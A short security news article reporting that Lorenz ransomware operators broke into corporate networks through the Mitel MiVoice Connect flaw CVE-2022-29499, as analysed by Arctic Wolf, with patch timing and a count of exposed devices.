Lorenz ransomware penetrates networks through a hole in Mitel VoIP devices

When analyzing the ransomware attack, Arctic Wolf Networks experts found that Lorenz ransomware operators used a critical vulnerability in MiVoice Connect, Mitel’s VoIP communication product, to enter the corporate network.

The Service Appliance component is responsible for the dangerous hole ( CVE-2022-29499, CVSS 9.8). The presence of the vulnerability allows issuing commands without authentication, calling the diagnostic script and threatens to remotely execute malicious code.

As a temporary protection measure, the vendor released (PDF) a special script in April; the problem, according to Arctic Wolf, was completely solved in July, when MiVC 19.3 was released. A Shodan search by renowned security expert Kevin Beaumont found more than 20,000 internet-accessible and potentially vulnerable devices, with the highest concentration in the US and UK.

Lorenz ransomware penetrates networks through a hole in Mitel VoIP devices

Lorenz ransomware penetrates networks through a hole in Mitel VoIP devices

The CVE-2022-29499 exploit helped attackers who came to the attention of Arctic Wolf get a reverse shell and develop an attack using Chisel, an open-source tunnelling application. Data encryption (on ESXi servers) was carried out using the Lorenz malware and the legitimate BitLocker tool developed by Microsoft .

This year, another critical vulnerability

Read more

Explore the site

More from the blog

Latest News